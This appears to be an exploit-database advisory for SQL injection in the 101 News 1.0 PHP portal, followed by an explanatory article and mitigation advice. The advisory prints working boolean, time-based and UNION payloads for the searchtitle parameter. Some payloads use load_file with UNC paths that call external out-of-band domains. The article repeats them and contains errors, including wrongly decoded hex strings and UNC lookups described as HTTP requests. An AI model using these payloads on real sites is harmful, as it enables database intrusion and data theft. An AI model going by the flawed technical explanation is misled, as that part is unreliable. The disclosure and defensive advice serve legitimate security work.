101 News 1.0 - Multiple-SQLi

Exploit Author: nu11secur1ty Analysis Author: www.bubbleslearn.ir Category: WebApps Language: SQL Published Date: 2024-01-31 
## Title: 101 News-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 09/16/2023
## Vendor: https://mayurik.com/
## Software: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The searchtitle parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.oastify.com\\utu'))+'
was submitted in the searchtitle parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed.


[+]Payload:
```mysql
---
Parameter: searchtitle (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: searchtitle=-7320%' OR 3167=3167 AND 'urvA%'='urvA

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchtitle=814271'+(select
load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%'
AND (SELECT 8775 FROM (SELECT(SLEEP(15)))yMEL) AND 'gPWH%'='gPWH

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: searchtitle=814271'+(select
load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%'
UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6a71,0x4b6d704e6546715a6662496571705179434d6d5a71586b567a4278464c564d61766174626f787063,0x7170767071),NULL,NULL#

## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/101%20News-1.0

## Proof and Exploit:
https://www.nu11secur1ty.com/2023/09/101-news-10-multiple-sqli.html

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
nu11secur1ty <http://nu11secur1ty.com/>


101 News 1.0 Multiple SQL Injection Vulnerability: A Deep Dive into Blind and Union-Based Exploits

Security researchers have identified a critical vulnerability in the 101 News 1.0 PHP-based news portal, a widely distributed open-source project available on platforms like SourceCodester and MayuriK.com. This application, designed to serve as a lightweight online news management system, has been found to be susceptible to multiple SQL injection (SQLi) attacks across several input parameters—most notably the searchtitle field. The vulnerability stems from improper input sanitization and the direct inclusion of user-supplied data in SQL queries without adequate escaping or parameterization.

Understanding the Vulnerability: SQL Injection in Action

SQL injection occurs when an attacker manipulates input fields to inject malicious SQL code into database queries. In the case of 101 News 1.0, the searchtitle parameter, used to search articles by title, is directly incorporated into a WHERE clause without validation or prepared statements. This creates a perfect vector for exploitation.

As demonstrated by researcher nu11secur1ty, the payload:


searchtitle=-7320%' OR 3167=3167 AND 'urvA%'='urvA

is a classic boolean-based blind SQL injection attack. The payload exploits the fact that MySQL evaluates logical conditions in SQL queries. By injecting a condition that always evaluates to true (e.g., 3167=3167), the attacker can infer whether the query executed successfully based on the application’s response—such as a different page load or error message.

Advanced Exploitation: Time-Based and File-Based Injection

More sophisticated techniques were used to confirm the presence of SQLi and extract data. One such method leverages the load_file() function, a MySQL feature that allows reading files from the server’s filesystem. However, when combined with UNC (Universal Naming Convention) paths, it can be used to trigger external HTTP requests—making it a powerful tool for out-of-band (OOB) data exfiltration.

Consider the following time-based payload:


searchtitle=814271'+(select load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%'
AND (SELECT 8775 FROM (SELECT(SLEEP(15)))yMEL) AND 'gPWH%'='gPWH

This payload combines two techniques:

  • Time-based blind SQLi: The SLEEP(15) function causes MySQL to pause for 15 seconds if the query is executed. The attacker can detect this delay via network timing analysis, confirming that the injection was successful.
  • File-based OOB attack: The load_file() function attempts to read a file located at a UNC path pointing to an external domain (tupaputka.com). Since the server’s MySQL instance can resolve UNC paths, it attempts to connect to the remote domain, which is monitored by the attacker via a request logging service (e.g., oastify.com).

This demonstrates that the application not only allows SQL injection but also enables external communication from the database server—indicating that the MySQL instance has remote file access capabilities, which is a serious security risk.

Union-Based SQL Injection: Data Extraction

Another powerful exploit involves the UNION query technique. This method allows attackers to append additional data from a query to the original result set, enabling the extraction of sensitive information.

Example payload:


searchtitle=814271'+(select load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%'
UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6a71,0x4b6d704e6546715a6662496571705179434d6d5a71586b567a4278464c564d61766174626f787063,0x7170767071),NULL,NULL#

Here, the attacker injects a UNION ALL clause that appends a CONCAT() function to the result. The 0x71627a6a71 and similar hexadecimal values represent the string qbjq, KmPNEqZfbIeqpQyCMdZqXkVzBxFLVdavatbopc, and qpvq—likely used to exfiltrate data or confirm the injection.

Since the application returns the query results, the attacker can observe the concatenated string in the response, confirming successful execution and data retrieval.

Implications and Risk Assessment

This vulnerability poses several serious risks:

  • Full database compromise: An attacker can extract user credentials, article content, configuration data, or even administrative privileges.
  • Remote code execution (RCE) via OOB: The ability to trigger HTTP requests from the database server opens doors to potential remote command execution if the server is misconfigured.
  • Server-side information disclosure: The load_file() function can expose internal file paths, system configuration, or even credentials stored in files.
  • Reputation damage: Publicly accessible news portals with SQLi vulnerabilities are prime targets for attackers seeking to deface content or inject malicious scripts.

Best Practices for Mitigation

Developers and system administrators must implement robust defenses against SQL injection. Key recommendations include:

Defense Measure Description
Prepared Statements Use parameterized queries (e.g., mysqli_prepare() or PDO) to separate SQL code from user input.
Input Sanitization Validate and filter input using whitelisting or regex patterns to reject malicious characters.
Least Privilege Principle Ensure database users have minimal permissions—disable LOAD_FILE or SELECT on sensitive tables.
Web Application Firewall (WAF) Deploy WAF rules to detect and block SQLi patterns in real-time.
Regular Audits and Penetration Testing Perform automated and manual testing using tools like sqlmap, Burp Suite, or OWASP ZAP.

Additionally, developers should avoid using load_file() or other dangerous functions in production environments unless absolutely necessary—and only with strict access controls.

Conclusion: A Cautionary Tale for Open-Source Projects

The 101 News 1.0 vulnerability serves as a stark reminder that open-source software is not inherently secure. While free projects like this offer convenience and rapid deployment, they often lack rigorous security testing. The presence of multiple SQL injection vectors—including blind, time-based, and UNION-based exploits—demonstrates how easily attackers can gain control over a system.

For system administrators and infrastructure engineers, this case highlights the importance of:

  • Regularly auditing third-party code
  • Implementing defense-in-depth strategies
  • Monitoring for unusual network activity (e.g., external HTTP requests from database servers)

Ultimately, security is not a one-time fix but an ongoing process. By learning from vulnerabilities like this, we can build more resilient systems and reduce the risk of exploitation